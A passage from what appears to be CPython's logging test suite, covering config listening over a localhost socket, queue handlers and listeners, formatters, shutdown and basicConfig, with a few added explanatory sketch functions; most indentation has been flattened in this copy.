self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t, 2.0)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
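# Illustrative sketch (not part of the test suite): the wire format that
# ConfigDictTest.setup_via_listener() above relies on -- logging.config.listen()
# expects a 4-byte big-endian length prefix followed by the configuration
# payload (JSON for dictConfig, ini text for fileConfig).  Host, port and
# config_dict are whatever the caller supplies.
def _example_send_config(port, config_dict):
    import json
    import socket
    import struct
    payload = json.dumps(config_dict).encode('utf-8')
    with socket.create_connection(('localhost', port), timeout=2.0) as sock:
        sock.sendall(struct.pack('>L', len(payload)) + payload)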
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
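# Illustrative sketch (not part of the test suite): instead of subclassing
# LogRecord as DerivedLogRecord does above, a common recipe wraps the current
# record factory and bolts an extra attribute onto every record.  The
# 'request_id' attribute and its placeholder value are invented for the example.
def _example_install_record_factory():
    import logging
    previous = logging.getLogRecordFactory()
    def factory(*args, **kwargs):
        record = previous(*args, **kwargs)
        record.request_id = 'n/a'    # placeholder; real code would look this up
        return record
    logging.setLogRecordFactory(factory)
    return previous                  # so the caller can restore the old factory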
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
        # Test that the traceback is only appended once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
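# Illustrative sketch (not part of the test suite): the usual QueueHandler /
# QueueListener pairing -- producers log through a QueueHandler, while a
# background QueueListener drains the queue into the real handlers, as the
# tests above exercise.  The logger name and the StreamHandler are placeholders.
def _example_queue_logging():
    import logging
    import logging.handlers
    import queue
    log_queue = queue.Queue(-1)
    listener = logging.handlers.QueueListener(log_queue, logging.StreamHandler(),
                                              respect_handler_level=True)
    logger = logging.getLogger("example.queued")
    logger.addHandler(logging.handlers.QueueHandler(log_queue))
    listener.start()
    try:
        logger.warning("handled on the listener's thread")
    finally:
        listener.stop()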
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
                log_queue = multiprocessing.Queue()
                self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
                # time.sleep(1)
                items = list(self.get_all_from_queue(log_queue))
                log_queue.close()
                log_queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
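# Illustrative sketch (not part of the test suite): logging.lastResort is a
# stderr handler with level WARNING that catches records emitted on loggers
# with no handlers anywhere in their hierarchy; setting it to None restores
# the old "No handlers could be found" message, as the test above shows.
# The bare Logger below is constructed directly so it has no parent handlers.
def _example_last_resort():
    import logging
    orphan = logging.Logger("example.orphan")
    orphan.warning("goes to stderr via logging.lastResort")
    orphan.debug("below WARNING, so silently dropped")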
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
# test the default value introduced in 3.7
# (Issue #28524)
logging.disable()
self.assertEqual(logging.root.manager.disable, logging.CRITICAL)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
def test_subclass_logger_cache(self):
# bpo-37258
message = []
class MyLogger(logging.getLoggerClass()):
def __init__(self, name='MyLogger', level=logging.NOTSET):
super().__init__(name, level)
message.append('initialized')
logging.setLoggerClass(MyLogger)
logger = logging.getLogger('just_some_logger')
self.assertEqual(message, ['initialized'])
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger.addHandler(h)
try:
logger.setLevel(logging.DEBUG)
logger.debug("hello")
self.assertEqual(stream.getvalue().strip(), "hello")
stream.truncate(0)
stream.seek(0)
logger.setLevel(logging.INFO)
logger.debug("hello")
self.assertEqual(stream.getvalue(), "")
finally:
logger.removeHandler(h)
h.close()
logging.setLoggerClass(logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
def test_recursion_error(self):
# Issue 36272
code = """if 1:
import logging
def rec():
logging.error("foo")
rec()
rec()"""
rc, out, err = assert_python_failure("-c", code)
err = err.decode()
self.assertNotIn("Cannot recover from stack overflow.", err)
self.assertEqual(rc, 1)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
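# Illustrative sketch (not part of the test suite): the module-level flags
# exercised in test_optional() above let applications skip collecting
# per-record thread and process information when it is never used; real code
# should save and restore the old values, as the test does.
def _example_disable_record_metadata():
    import logging
    logging.logThreads = False            # record.thread / record.threadName become None
    logging.logProcesses = False          # record.process becomes None
    logging.logMultiprocessing = False    # record.processName becomes None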
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.setLevel(self.original_logging_level)
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
